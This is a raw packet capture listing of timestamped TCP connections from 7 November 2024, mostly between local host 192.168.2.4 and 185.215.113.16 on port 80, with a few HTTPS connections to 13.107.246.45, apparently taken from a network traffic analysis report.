Nov 7, 2024 07:33:25.533334017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533345938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533364058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533387899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533565044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533576012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533587933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533605099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533612013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533616066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533627987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533638954 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533638954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533658028 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533689022 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533857107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533869028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533879995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533905983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533915997 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534001112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534012079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534022093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534032106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534041882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534049988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534053087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534063101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534073114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534089088 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534092903 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534099102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534109116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534110069 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534123898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534133911 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534151077 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534171104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534658909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534914017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534914017 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534924984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534934998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534945011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534949064 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534955978 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534959078 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534966946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534977913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.534981012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.534989119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535000086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535010099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535011053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535021067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535022020 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535031080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535041094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535048962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535058975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535063028 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535068989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535083055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535095930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535105944 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535135031 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535819054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535830021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535840034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535851002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535861969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535866022 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535871983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535883904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535893917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535897970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535904884 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535909891 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535914898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535926104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535933971 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535937071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535947084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535959005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535969973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535979033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.535980940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.535994053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536004066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536010027 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536032915 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536040068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536783934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536794901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536804914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536823034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536832094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536840916 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536843061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536854029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536865950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536870003 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536878109 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536889076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536891937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536900043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536911964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536912918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536922932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536932945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536935091 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536946058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536956072 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536962032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.536966085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536977053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.536978960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.537003040 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.537019014 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.537637949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537650108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537658930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537671089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537678957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.537681103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537693024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537698984 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.537703991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537714958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537725925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537733078 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.537739038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.537759066 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.537776947 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569237947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569283009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569298983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569350004 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569394112 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569427013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569438934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569454908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569468975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569479942 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569504976 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569643021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569660902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569673061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569684982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569695950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569705963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569710016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569735050 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569757938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.569895029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569977045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569988012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.569998026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570009947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570014000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.570020914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570054054 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.570066929 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.570295095 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570312023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570322037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570327044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570337057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.570337057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.570357084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.570385933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.610766888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.610789061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.610801935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.610837936 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.610869884 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.618321896 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.618345976 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.618355989 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.618362904 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.632683039 CET	49898	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.632690907 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.633138895 CET	49898	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.633142948 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.635639906 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.652569056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652590990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652604103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652621984 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.652657032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.652744055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652755976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652765989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652784109 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652785063 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.652796984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652813911 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.652842999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.652945995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652956963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652973890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.652992964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653007984 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653029919 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653084040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653095007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653105974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653120041 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653129101 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653156042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653310061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653321028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653332949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653346062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653357983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653378010 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653528929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653539896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653552055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653563023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653573036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653579950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653611898 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653628111 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653695107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653798103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653820992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653837919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653840065 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653848886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653858900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653865099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653870106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653882027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653892040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.653893948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.653923988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654242992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654253006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654263020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654273987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654284954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654294968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654294968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654305935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654315948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654316902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654328108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654330015 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654356956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654376030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654704094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654716015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654726028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654736996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654747963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654750109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654763937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654767990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654774904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654784918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654797077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654800892 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654807091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.654808998 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.654839993 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655113935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655122995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655133009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655153990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655164003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655177116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655185938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655186892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655198097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655210018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655213118 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655240059 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655253887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655633926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655644894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655654907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655664921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655675888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655683041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655685902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655698061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655708075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655714989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655719042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655728102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655733109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655738115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655747890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655751944 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655760050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655771017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655780077 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655781984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655792952 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655802965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655808926 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655814886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655822039 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655824900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.655843973 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.655865908 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656610012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656620026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656630039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656640053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656650066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656661034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656665087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656671047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656682014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656692982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656702042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656706095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656712055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656721115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656732082 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656735897 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656743050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656753063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656755924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656764984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656769991 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656775951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656786919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656796932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.656797886 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656822920 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.656840086 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.657457113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.657469034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.657479048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.657490015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.657497883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.657500982 CET	80	49882	185.215.113.16	192.168.2.4
